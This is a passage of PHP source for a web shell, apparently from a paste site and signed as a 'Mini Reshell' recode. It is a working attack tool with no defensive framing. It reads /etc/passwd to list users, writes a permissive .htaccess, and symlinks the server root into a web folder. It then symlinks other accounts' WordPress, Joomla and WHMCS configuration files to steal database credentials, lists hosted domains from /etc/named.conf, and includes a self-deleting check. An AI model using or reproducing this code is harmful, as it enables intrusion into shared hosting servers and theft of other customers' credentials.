  685. ?>
  686.  
  687.  
  688. <?php
  689. //user
  690. if(isset($_POST['usre'])){
  691. ?><form method=post>
  692.  
  693. <textarea rows=10 cols=50 name=user><?php $users=file("/etc/passwd");
  694. foreach($users as $user)
  695. {
  696. $str=explode(":",$user);
  697. echo $str[0]."\n";
  698. }
  699. ?></textarea>
  700.  
  701. <br><br>
  702.  
  703. <input type=submit name=su value="Grabber Now !!" /></form>
  704.  
  705. <?php } ?>
  706.  
  707. <?php
  708. //config
  709. error_reporting(0);
  710. if(isset($_POST['su']))
  711. {
  712. mkdir('hkc',0777);
  713. $rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  714. $g = fopen('hkc/.htaccess','w');
  715. fwrite($g,$rr);
  716. $hkc = symlink("/","hkc/root");
  717. $rt="<a href=hkc/root><font color=white size=3 face=\"Tahoma\"> Boxed</font></a>";
  718. echo "See for folder symlink <br><u>$rt</u>";
  719. $dir=mkdir('hkc',0777);
  720. $r = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  721. $f = fopen('hkc/.htaccess','w');
  722. fwrite($f,$r);
  723. $consym="<a href=hkc/><font color=white size=3 face=\"Tahoma\">Configuration files</font></a>";
  724. echo "<br>Result<br><u><font color=red size=2 face=\"Tahoma\">$consym</font></u>";
  725. $usr=explode("\n",$_POST['user']);
  726. $configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");
  727. foreach($usr as $uss )
  728. {
  729. $us=trim($uss);
  730. foreach($configuration as $c)
  731. {
  732. $rs="/home/".$us."/public_html/".$c;
  733. $r="hkc/".$us." .. ".$c;
  734. symlink($rs,$r);
  735. }
  736. }
  737. }
  738. }
  739. ?>
  740.  
  741.  
  742. <?php
  743. //domain viewer
  744.   if(isset($_GET['beby']) && ($_GET['beby'] == 'domain'))
  745. {
  746. ?>
  747. <form action="?beby=domain" method="post">
  748. <?php
  749. //radable public_html
  750. echo "<br><br>";
  751. $file = @implode(@file("/etc/named.conf"));
  752. if(!$file){ die("<font color='green'># can't ReaD -> [ /etc/named.conf ]    </font>
  753.    
  754.     </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  755.         <br><center>$nick Mini Reshell</center>
  756.          "); }
  757. preg_match_all("#named/(.*?).db#",$file ,$r);
  758. $domains = array_unique($r[1]);
  759. function check() { (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):""; }
  760. check();
  761. echo '  <center>
  762.      [+] Here We Have : [<font style=color:#00FF00>".count($domains)."</font>] Listed Domains In localhost.</center>
  763.        <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><td style="background:darkred;color:white;text-align:center;"><b>List Of Users</b></td> <td style="background:darkred;color:white;text-align:center;border-left:1px solid white;"> <b><font style=color:#F80;List Of Domains</b></td></tr> ';
  764. foreach($domains as $domain)
  765.        {
  766.        $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  767.        echo "<tr><td><a href='http://www.$domain' target='_blank' style='color:#00FF00;'>$domain</a></td><td style='border-left:1px solid white;'>".$user['name']."</td></tr>";
  768.        }
  769. echo "</table>";
  770. //redable public_html
  771. }
  772.  
  773. ?>
  774.  
  775.  
  776.    
  777.     </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By <?php echo $nick; ?></font></center><b>
  778.         <br><center><?php echo $nick; ?> Mini Reshell</center>
  779.        
  780. <?php
  781. //permision
  782. function perms($file){
  783. $perms = fileperms($file);
  784.  
  785. if (($perms & 0xC000) == 0xC000) {
  786. // Socket
  787. $info = 's';
  788. } elseif (($perms & 0xA000) == 0xA000) {
  789. // Symbolic Link
  790. $info = 'l';
  791. } elseif (($perms & 0x8000) == 0x8000) {
  792. // Regular
  793. $info = '-';
  794. } elseif (($perms & 0x6000) == 0x6000) {
  795. // Block special
  796. $info = 'b';
  797. } elseif (($perms & 0x4000) == 0x4000) {
  798. // Directory
  799. $info = 'd';
  800. } elseif (($perms & 0x2000) == 0x2000) {
  801. // Character special
  802. $info = 'c';
  803. } elseif (($perms & 0x1000) == 0x1000) {
  804. // FIFO pipe
  805. $info = 'p';
  806. } else {
  807. // Unknown
  808. $info = 'u';
  809. }
  810.  
  811. // Owner
  812. $info .= (($perms & 0x0100) ? 'r' : '-');
  813. $info .= (($perms & 0x0080) ? 'w' : '-');
  814. $info .= (($perms & 0x0040) ?
  815. (($perms & 0x0800) ? 's' : 'x' ) :
  816. (($perms & 0x0800) ? 'S' : '-'));
  817.  
  818. // Group
  819. $info .= (($perms & 0x0020) ? 'r' : '-');
  820. $info .= (($perms & 0x0010) ? 'w' : '-');
  821. $info .= (($perms & 0x0008) ?
  822. (($perms & 0x0400) ? 's' : 'x' ) :
  823. (($perms & 0x0400) ? 'S' : '-'));
  824.  
  825. // World
  826. $info .= (($perms & 0x0004) ? 'r' : '-');
  827. $info .= (($perms & 0x0002) ? 'w' : '-');
  828. $info .= (($perms & 0x0001) ?
  829. (($perms & 0x0200) ? 't' : 'x' ) :
  830. (($perms & 0x0200) ? 'T' : '-'));
  831.  
  832. return $info;
  833. }
  834. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement